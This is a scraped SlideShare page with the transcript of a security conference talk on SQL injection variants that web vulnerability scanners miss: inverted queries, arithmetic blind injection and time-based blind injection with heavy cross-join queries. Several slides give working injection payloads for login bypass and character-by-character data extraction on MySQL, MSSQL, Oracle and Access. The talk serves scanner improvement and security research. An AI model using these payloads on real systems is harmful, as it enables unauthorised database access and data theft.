How "·$% developers defeat the web vulnerability scanners

67,527
-1

Published on

Share Favorite
Favorited X
Download More...
Favorited! Want to add tags? Have an opinion? Make a quick comment as well. Cancel
Edit your favorites Cancel
Send to your Group / Event Select Group / Event
Add your message Cancel
Post toBlogger WordPress Twitter Facebook Deliciousmore share options .Embed For WordPress.com

Without related presentations

0 commentsPost a comment

Post a comment
..
Embed Video Subscribe to follow-up comments Unsubscribe from followup comments .
Edit your comment Cancel .Notes on slide 1
no notes for slide #1

no notes for slide #1
..Favorites, Groups & Events
more
How "·$% developers defeat the web vulnerability scanners - Presentation Transcript
1.How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica
2.Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavey Queries
5.- Conclusions
3.1.-Introduction
4.SQL Injection is still here among us
5.Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs
6.Need to Improve Automatic Scanning
Not always a manual scanning is possible
Time
Confidentiality
Money, money, money…
Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools.
7.2.-Inverted Queries
8.
9.Homers, how are they?
Lazy
Bad trainined
Poor Experience in security stuff
Don´t like working
Don´t like computing
Don´t like coding
Don´t like you!
10.Flanders are Left-handed
11.Right
SELECT UID
FROM USERS
WHERE NAME=‘V_NAME’
AND
PASSWORD=‘V_PASSW’;
12.Wrong?
SELECT UID
FROM USERS
WHERE ‘V_NAME’=NAME AND
‘ V_PASSW’=PASSWORD
13.Login Inverted Query
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1
Select uid
From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password
 FAIL
14.Login Inverted SQL Injection an example
Select uid
From users where ‘v_name’=name and ‘v_pass’=password
http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica
Select uid
From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password
 Success
15.Blind Attacks
Attacker injects code but can´t access directly to the data.
However this injection changes the behavior of the web application.
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
Blind SQL Injection
Biind Xpath Injection
Blind LDAP Injection
16.Blind SQL Injection Attacks
Attacker injects:
“ True where clauses”
“ False where clauses“
Ex:
Program.php?id=1 and 1=1
Program.php?id=1 and 1=2
Program doesn’t return any visible data from database or data in error messages.
The attacker can´t see any data extracted from the database.
17.Blind SQL Injection Attacks
Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”:
Different hashes
Different html structure
Different patterns (keywords)
Different linear ASCII sums
“ Different behavior”
By example: Response Time
18.Blind SQL Injection Attacks
If any difference exists, then:
Attacker can extract all information from database
How? Using “booleanization”
MySQL:
Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
“ True-Answer Page” or “False-Answer Page”?
MSSQL:
Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers)
Oracle:
Program.php?id=1 and 100>(Select ASCII(Sub

Published in: Technology
2 Comments
8 Likes
Statistics
Notes
  • read the ppt and watch the video. Commets are not working in those environment.... learn before comment, please.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • term 'inverted queries' is a fallacy. little better automated tools (e.g. sqlmap) than you've tested are using something called 'comments' to comment out the rest of the query in your 'inverted query'. slide 19/66: instead of '?v_value=2 and 1=1' use '?v_value=2 and 1=1-- ' and that's it. please, don't envangelise 'inverted queries'. use 'parametrized' queries for god sake.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total Views
67,527
On Slideshare
0
From Embeds
0
Number of Embeds
53
Actions
Shares
0
Downloads
263
Comments
2
Likes
8
Embeds 0
No embeds

No notes for slide

How "·$% developers defeat the web vulnerability scanners

  1. 1. How ?¿$·& developers defeat the most famous web vulnerability scanners …or how to recognize old friends Chema Alonso Informática64 José Parada Microsoft Ibérica
  2. 2. Agenda <ul><li>1.- Introduction </li></ul><ul><li>2.- Inverted Queries </li></ul><ul><li>3.- Arithmetic Blind SQL Injection </li></ul><ul><li>4.- Time-Based Blind SQL Injection using Heavey Queries </li></ul><ul><li>5.- Conclusions </li></ul>
  3. 3. 1.-Introduction
  4. 4. SQL Injection is still here among us
  5. 5. Web Application Security Consortium: Comparision http://projects.webappsec.org/Web-Application-Security-Statistics 12.186 sites 97.554 bugs
  6. 6. Need to Improve Automatic Scanning <ul><li>Not always a manual scanning is possible </li></ul><ul><ul><li>Time </li></ul></ul><ul><ul><li>Confidentiality </li></ul></ul><ul><ul><li>Money, money, money… </li></ul></ul><ul><li>Need to study new ways to recognize old fashion vulnerabilities to improve automatic scanning tools. </li></ul>
  7. 7. 2.-Inverted Queries
  8. 9. Homers, how are they? <ul><li>Lazy </li></ul><ul><li>Bad trainined </li></ul><ul><li>Poor Experience in security stuff </li></ul><ul><li>Don´t like working </li></ul><ul><li>Don´t like computing </li></ul><ul><li>Don´t like coding </li></ul><ul><li>Don´t like you! </li></ul>
  9. 10. Flanders are Left-handed
  10. 11. Right <ul><li>SELECT UID </li></ul><ul><li>FROM USERS </li></ul><ul><li>WHERE NAME=‘V_NAME’ </li></ul><ul><li>AND </li></ul><ul><li>PASSWORD=‘V_PASSW’; </li></ul>
  11. 12. Wrong? <ul><li>SELECT UID </li></ul><ul><li>FROM USERS </li></ul><ul><li>WHERE ‘V_NAME’=NAME AND </li></ul><ul><li>‘ V_PASSW’=PASSWORD </li></ul>
  12. 13. Login Inverted Query <ul><li>Select uid </li></ul><ul><li>From users where ‘v_name’=name and ‘v_pass’=password </li></ul><ul><li>http://www.web.com/login.php?v_name=Robert&v_pass=Kubica’ or '1'='1 </li></ul><ul><li>Select uid </li></ul><ul><li>From users where ‘Robert’=name and ‘Kubica’ or ‘1’=‘1’=password </li></ul><ul><li> FAIL </li></ul>
  13. 14. Login Inverted SQL Injection an example <ul><li>Select uid </li></ul><ul><li>From users where ‘v_name’=name and ‘v_pass’=password </li></ul><ul><li>http://www.web.com/login.php?v_name=Robert&v_pass=’=‘’ or ‘1’=‘1’ or ‘Kubica </li></ul><ul><li>Select uid </li></ul><ul><li>From users where ‘Robert’=name and ’’=‘’ or ‘1’=‘1’ or ‘Kubica’=password </li></ul><ul><li> Success </li></ul>
  14. 15. Blind Attacks <ul><li>Attacker injects code but can´t access directly to the data. </li></ul><ul><li>However this injection changes the behavior of the web application. </li></ul><ul><li>Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. </li></ul><ul><ul><li>Blind SQL Injection </li></ul></ul><ul><ul><li>Biind Xpath Injection </li></ul></ul><ul><ul><li>Blind LDAP Injection </li></ul></ul>
  15. 16. Blind SQL Injection Attacks <ul><li>Attacker injects: </li></ul><ul><ul><li>“ True where clauses” </li></ul></ul><ul><ul><li>“ False where clauses“ </li></ul></ul><ul><ul><li>Ex: </li></ul></ul><ul><ul><ul><li>Program.php?id=1 and 1=1 </li></ul></ul></ul><ul><ul><ul><li>Program.php?id=1 and 1=2 </li></ul></ul></ul><ul><li>Program doesn’t return any visible data from database or data in error messages. </li></ul><ul><li>The attacker can´t see any data extracted from the database. </li></ul>
  16. 17. Blind SQL Injection Attacks <ul><li>Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: </li></ul><ul><ul><li>Different hashes </li></ul></ul><ul><ul><li>Different html structure </li></ul></ul><ul><ul><li>Different patterns (keywords) </li></ul></ul><ul><ul><li>Different linear ASCII sums </li></ul></ul><ul><ul><li>“ Different behavior” </li></ul></ul><ul><ul><ul><li>By example: Response Time </li></ul></ul></ul>
  17. 18. Blind SQL Injection Attacks <ul><li>If any difference exists, then: </li></ul><ul><ul><li>Attacker can extract all information from database </li></ul></ul><ul><ul><li>How? Using “booleanization” </li></ul></ul><ul><ul><ul><li>MySQL: </li></ul></ul></ul><ul><ul><ul><ul><li>Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) </li></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>“ True-Answer Page” or “False-Answer Page”? </li></ul></ul></ul></ul></ul><ul><ul><ul><li>MSSQL: </li></ul></ul></ul><ul><ul><ul><ul><li>Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) </li></ul></ul></ul></ul><ul><ul><ul><li>Oracle: </li></ul></ul></ul><ul><ul><ul><ul><li>Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1) </li></ul></ul></ul></ul>
  18. 19. Blind Inverted Query <ul><li>Select product </li></ul><ul><li>From products </li></ul><ul><li>Where v_value=id; </li></ul><ul><li>http://www.web.com/products.php?v_value= 2 and 1=1 </li></ul><ul><li>Select product </li></ul><ul><li>From products </li></ul><ul><li>Where 2 and 1=1=id; </li></ul><ul><li>-> FAIL </li></ul>
  19. 20. The MySQL Case <ul><li>1 is True </li></ul><ul><li>1=1=1 ->True </li></ul><ul><li>1=1=(1+1-1)=abs(1)=1 -> True </li></ul><ul><li>2=2=2 ->False </li></ul><ul><li>-> 2=2 becomes True -> True=2 </li></ul><ul><li>-> True is equals to 1 then 1=2 is False </li></ul><ul><li>Select product </li></ul><ul><li>From products </li></ul><ul><li>Where v_value=id; </li></ul><ul><li>http://www.web.com/products.php?v_value= 1 and 1=1 </li></ul><ul><li>Select product </li></ul><ul><li>From products </li></ul><ul><li>Where 1 and 1=1=id; </li></ul><ul><li>-> SUCCES (if there is a Id=1) </li></ul>
  20. 21. Web Scanner behaviors <ul><li>Acunetix </li></ul><ul><li>Paros </li></ul><ul><li>AppScan </li></ul><ul><li>W3af </li></ul><ul><li>Wapiti </li></ul><ul><li>Proxy Strike </li></ul>
  21. 22. Acunetix & Homer
  22. 23. Acunetix & Flanders
  23. 24. AppScan & Homer
  24. 25. AppScan & Flanders
  25. 26. Paros & Homer
  26. 27. Paros & Flanders
  27. 28. W3af & Homer
  28. 29. W3af & Flanders
  29. 30. Wapiti & Homer
  30. 31. Wapiti & Flanders
  31. 32. Demo <ul><li>W3af </li></ul><ul><li>Wapiti </li></ul><ul><li>Proxy Strike </li></ul>
  32. 33. Results   Normal Inverted   MySQL MS SQL Server MySQL MS SQL Server   Numeric String Numeric String Numeric String Numeric String Paros                 AppScan                 Acunetix                 w3af                 wapiti                 Proxy Strike                
  33. 34. In the end… <ul><li>OUCH!!! </li></ul><ul><li>Thank God for keep me safe </li></ul>
  34. 35. Solutions? <ul><li>Concat string injection </li></ul><ul><li>Arithmetic Blind SQL Injection </li></ul><ul><li>Time-Based Blind SQL injection </li></ul><ul><ul><li>Delay Functions </li></ul></ul><ul><ul><li>Heavy queries </li></ul></ul>
  35. 36. 3.- Arithmetic
  36. 37. What about this queries? <ul><li>How to detect/exploit this Blind SQLinjection vulnerability? </li></ul><ul><ul><li>The query forces the parameter to be numeric </li></ul></ul><ul><ul><li>SELECT field FROM table WHERE id=abs( param ) </li></ul></ul><ul><ul><li>Ex: </li></ul></ul><ul><ul><li>Get Param( ID ) </li></ul></ul><ul><ul><li>Select ….. Where att1=abs( ID ) </li></ul></ul><ul><ul><li>Select ….. Where att2=k1- ID </li></ul></ul><ul><ul><li>Print response </li></ul></ul><ul><li>Not AND or OR operators can be used. </li></ul><ul><li>Boolean logic needs to be created with math operations </li></ul>
  37. 38. Arithmetic Blind SQL Injection <ul><li>Divide by zero (David Litchfield) </li></ul><ul><ul><li>Id=A+(1/(ASCII(B)-C)) </li></ul></ul><ul><ul><ul><li>A-> Param value originally used in the query. </li></ul></ul></ul><ul><ul><ul><li>B -> Value we are searching for, e.g.: Substring(passwd,1,1) </li></ul></ul></ul><ul><ul><ul><li>C-> Counter [0..255] </li></ul></ul></ul><ul><ul><li>TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception. </li></ul></ul>
  38. 39. Arithmetic Blind SQL Injection <ul><li>Sums and subtractions </li></ul><ul><ul><li>Id=A+ASCII(B)-C </li></ul></ul><ul><ul><ul><li>A-> Param value originally used in the query. </li></ul></ul></ul><ul><ul><ul><li>B -> Value we are searching for, e.g.: Substring(passwd,1,1) </li></ul></ul></ul><ul><ul><ul><li>C-> Counter [0..255] </li></ul></ul></ul><ul><ul><li>When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A </li></ul></ul>
  39. 40. Arithmetic Blind SQL Injection <ul><li>Value type overflow </li></ul><ul><ul><li>Id=A+((C/ASCII(B))*(K)) </li></ul></ul><ul><ul><ul><li>A-> Param value originally used in the query. </li></ul></ul></ul><ul><ul><ul><li>B -> Value we are searching for, e.g.: Substring(passwd,1,1) </li></ul></ul></ul><ul><ul><ul><li>C-> Counter [0..255] </li></ul></ul></ul><ul><ul><ul><li>K-> Value that overflows the type defined for A </li></ul></ul></ul><ul><ul><ul><ul><li>(e.g. if A is integer, then K=2^ 32 ) </li></ul></ul></ul></ul><ul><ul><li>When C/ASCII(B)==1, K*1 overflows the data type </li></ul></ul>
  40. 41. Demo: <ul><li>Divide by zero </li></ul><ul><li>Sums and subtractions </li></ul><ul><li>Integer overflow </li></ul>
  41. 42. Conclusions <ul><li>Arithmetic Blind SQL Injection allows to construct binary logic without “AND” and “OR”. </li></ul><ul><ul><li>detects bugs in this kind of queries… </li></ul></ul><ul><ul><li>And also in Inverted queries in which a numeric value is used </li></ul></ul><ul><li>Almost none of the vulnerability scanners are using this method </li></ul>
  42. 43. 4.-Time-based Blind SQL Injection using heavy queries
  43. 44. Time-Based Blind SQL Injection <ul><li>In scenarios with no differences between “True-Answer Page” and “False-Answer Page”, time delays can be used. </li></ul><ul><li>Injection forces a delay in the response page when the condition injected is True. </li></ul><ul><ul><li>- Delay functions: </li></ul></ul><ul><ul><ul><li>SQL Server: waitfor </li></ul></ul></ul><ul><ul><ul><li>Oracle: dbms_lock.sleep </li></ul></ul></ul><ul><ul><ul><li>MySQL: sleep or Benchmark Function </li></ul></ul></ul><ul><ul><ul><li>Postgres: pg_sleep </li></ul></ul></ul><ul><ul><li>Ex: </li></ul></ul><ul><ul><ul><li>; if (exists(select * from users)) waitfor delay '0:0:5’ </li></ul></ul></ul>
  44. 45. Time-Based Blind SQL Injection <ul><li>What about DBs without delay functions, i.e.: </li></ul><ul><li>Oracle connections MS Access DB2 </li></ul><ul><li>without PL/SQL injection </li></ul><ul><li>Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks? </li></ul>
  45. 47. “ Where-Clause” execution order <ul><li>Select “whatever “ </li></ul><ul><li>From whatever </li></ul><ul><li>Where condition1 and condition2 </li></ul><ul><li>- Condition1 lasts 10 seconds </li></ul><ul><li>- Condition2 lasts 100 seconds </li></ul><ul><li>Which condition should be executed first? </li></ul>
  46. 48. The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec
  47. 49. The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec
  48. 50. Time-Based Blind SQL Injection using Heavy Queries <ul><li>Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. </li></ul><ul><li>It depends on how the database engine evaluates the where clauses in the query. </li></ul><ul><li>There are two types of database engines: </li></ul><ul><ul><li>Databases without optimization process </li></ul></ul><ul><ul><li>Databases with optimization process </li></ul></ul>
  49. 51. Time-Based Blind SQL Injection using Heavy Queries <ul><li>Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. </li></ul><ul><li>The Cross-join injection must be heavier than the other condition. </li></ul><ul><li>Attacker only have to know or to guess the name of a table with select permission in the database. </li></ul><ul><li>Example in MSSQL: </li></ul><ul><ul><li>Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers) </li></ul></ul>
  50. 52. “ Default” tables to construct a heavy query <ul><ul><li>Microsoft SQL Server </li></ul></ul><ul><ul><ul><li>sysusers </li></ul></ul></ul><ul><ul><li>Oracle </li></ul></ul><ul><ul><ul><li>all_users </li></ul></ul></ul><ul><ul><li>MySQL (versión 5) </li></ul></ul><ul><ul><ul><li>information_schema.columns </li></ul></ul></ul><ul><ul><li>Microsoft Access </li></ul></ul><ul><ul><ul><li>MSysAccessObjects (97 & 2000 versions) </li></ul></ul></ul><ul><ul><ul><li>MSysAccessStorage (2003 & 2007) </li></ul></ul></ul>
  51. 53. “ Default” tables to construct a heavy query <ul><li>… or whatever you can guess </li></ul><ul><ul><li>Clients </li></ul></ul><ul><ul><li>Customers </li></ul></ul><ul><ul><li>News </li></ul></ul><ul><ul><li>Logins </li></ul></ul><ul><ul><li>Users </li></ul></ul><ul><ul><li>Providers </li></ul></ul><ul><ul><li>… .Use your imagination… </li></ul></ul>
  52. 54. Ex 1: MS SQL Server <ul><li>Query takes 14 seconds -> True-Answer </li></ul>
  53. 55. Ex 1: MS SQL Server <ul><li>Query takes 1 second -> False-Answer </li></ul>
  54. 56. Ex 2: Oracle <ul><li>Query Takes 22 seconds –> True-Answer </li></ul>
  55. 57. Ex 2: Oracle <ul><li>Query Takes 1 second –> False-Answer </li></ul>
  56. 58. Ex 3: Access 2007 <ul><li>Query Takes 39 seconds –> True-Answer </li></ul>
  57. 59. Ex 3: Access 2007 <ul><li>Query Takes 1 second –> False-Answer </li></ul>
  58. 60. Marathon Tool <ul><li>Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. </li></ul><ul><li>Schema Extraction from known databases </li></ul><ul><li>Extract data using heavy queries not matter in which database engine (without schema) </li></ul><ul><li>Developed in .NET </li></ul><ul><li>Source code available </li></ul><ul><li>http://www.codeplex.com/marathontool </li></ul>
  59. 61. Demo: Marathon Tool
  60. 62. 5.- Conclusions
  61. 63. The real world has plenty kinds of developers…
  62. 64. References <ul><li>Inverted SQL queries (Spanish) </li></ul><ul><li>http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html </li></ul><ul><li>Arithemtic Blind SQL Injection (spanish) </li></ul><ul><li>http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html </li></ul><ul><li>Time-Based Blind SQL Injection Using heavy queries & Marathon Tool </li></ul><ul><li>http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf </li></ul><ul><li>Marathon Tool </li></ul><ul><li>http://www.codeplex.com/marathontool </li></ul><ul><li>Connection String Attacks (spanish) </li></ul><ul><li>http://www.slideshare.net/chemai64/connection-string-parameter-pollution </li></ul>
  63. 65. Don´t complain about your job!!
  64. 66. Thanks! Chema Alonso ( [email_address] ) José Parada ( [email_address] )
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×